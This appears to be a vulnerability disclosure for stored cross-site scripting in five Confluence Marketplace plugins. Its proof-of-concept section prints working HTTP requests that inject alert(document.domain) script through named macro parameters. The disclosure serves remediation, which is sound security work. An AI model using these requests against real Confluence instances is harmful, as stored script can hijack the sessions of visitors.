Multiple Cross-site Scripting Vulnerabilities In Confluence Marketplace Plugins

Vendor Description

PlantUML

“Macros to add various UML diagrams and other diagrams”
Vendor: https://www.avono.de

Refined Toolkit for Confluence

“Improve Confluence Pages with Handy UI Tools”
Vendor: https://www.refined.com

Linking for Confluence

“Enable one-click links to access Confluence templates, aggregate resources, and create structured content”
Vendor: https://www.servicerocket.com

Countdown Timer

“Countdown widget for Confluence”
Vendor: www.akeles.com

Server Status

“A collection of some server status tools for confluence”
Vendor: https://aptis-solutions.com

Business Recommendation

Update to the latest versions of the plugins. An in-depth security analysis performed by security professionals is highly advised, as the plugins may be affected from further security issues.

Vulnerability Overview / Description

1) PlantUML – Stored Cross-Site Scripting

The Database Information macro is a component of PlantUML and can be used to inject JavaScript code into Confluence pages, leading to a stored cross-site scripting vulnerability.

2) Refined Toolkit for Confluece – Stored Cross-Site Scripting

The elements UI-Image and UI-Button can be used to inject JavaScript code into Confluence pages, leading to a stored cross-site scripting vulnerability.

3) Linking for Confluence – Stored Cross-Site Scripting

The Link in New Windows macro can be used to inject JavaScript code into Confluence pages, leading to a stored cross-site scripting vulnerability.

4) Countdown Timer – Stored Cross-Site Scripting

The Countdown Timer macro can be used to inject JavaScript code into Confluence pages, leading to a stored cross-site scripting vulnerability.

5) Server Status – Stored Cross-Site Scripting

The two macros HTTP Status and SMTP Status can be used to inject JavaScript code into Confluence pages, leading to a stored cross site scripting vulnerability.

Proof Of Concept

1) PlantUML – Stored Cross-Site Scripting

In the component Database Information a data source can be configured through the parameter “datasources”. This parameter allows an attacker to inject a JavaScript code. The code is executed when a user visits the page where the macro is used. Below is the example on how the XSS issue can be exploited:

POST /rest/tinymce/1/macro/placeholder HTTP/1.1 Host: confluence:8090 [...] Referer: confluence/pages/resumedraft.action; {"contentId":"65622","macro": {"name":"database-info","params":{"datasources":"<script> alert(document.domain)</script>","attributes":"sdfdsf"},"body":""}}

2) Refined Toolkit for Confluece – Stored Cross-Site Scripting

In the two components UI-Image and UI-Button the parameter “url” allows an attacker to inject a JavaScript code. This code is executed when a user clicks on the created image/button on the Confluence page.

The following request demonstrates the creation of such an UI-Image macro:

POST /rest/tinymce/1/macro/placeholder HTTP/1.1 Host: confluence:8090 [...] Referer: confluence/pages/resumedraft.action ?draftId=65609&draftShareId=d0b7c806-ec40-4f56-8bdf-bd19474e8073& {"contentId":"65603","macro":{"name":"ui-image","params": {"imageUrl":"test","linkUrl":"javascript:alert(document.domain)"},"body":""}}

3) Linking for Confluence – Stored Cross-Site Scripting

The parameter “href” in the Link in New Window macro allows an attacker to inject a JavaScript code. This code is executed when a user clicks on the created Link on the Confluence page.

The following request demonstrates the creation of such a link:

POST /rest/tinymce/1/macro/placeholder HTTP/1.1 Host: confluence:8090 [...] Referer: confluence/pages/resumedraft.action ?draftId=65609&draftShareId=d0b7c806-ec40-4f56-8bdf-bd19474e8073& {"contentId":"65603","macro":{"name":"link-window","params": {"href":"javascript:alert(document.domain)","linkText":"click here"},"body":""}}

4) Countdown Timer – Stored Cross-Site Scripting

In the Countdown Timer plugin it is possible to set a countdown date through the parameter “countdowndate”. This parameter allows an attacker to inject a JavaScript code. The code is executed when a user visits the page where the plugin is used.

Below is the example on how the XSS issue can be exploited:

POST /rest/tinymce/1/macro/placeholder HTTP/1.1 Host: confluence:8090 [...] Referer: confluence/pages/resumedraft.action ?draftId=65627&draftShareId=de758257-a056-479e-9e6a-eccdede26003& {"contentId":"65626","macro":{"name":"countdown","params": {"countdowndate":"<script>alert(document.domain)</script>"},"body":""}}

5) Server Status – Stored Cross-Site Scripting

In the two components HTTP Status and SMTP status it is possible to set a text through the parameter “displayText”. This parameter allows an attacker to inject a JavaScript code. The code is executed when a user visits the page where the plugin is used.

Below is the example on how the XSS issue can be exploited:

POST /rest/tinymce/1/macro/placeholder HTTP/1.1 Host: confluence:8090 [...] Referer: confluence/pages/resumedraft.action ?draftId=65619&draftShareId=efc17088-e2b6-4c29-9f0b-8ee90b4c03b7& {"contentId":"65618","macro":{"name":"server-status-http-request","params": {"url":"http://test.com","displayText":"<script>alert(document.domain)</script>","theme":"Color"},"body":""}}

Vulnerable / Tested Versions

The following versions of the plugins have been tested, which were the latest versions available at the time of the test.

• PlantUML was tested in version 6.43.
• Refined Toolkit for Confluence was tested in version 2.2.5.
• Linking for Confluence was tested in version 5.5.3. Countdown Timer was tested in version 1.7.0.
• Server Status was tested in version 1.2.1.

It is assumed earlier versions of the plugins are also vulnerable to the issues.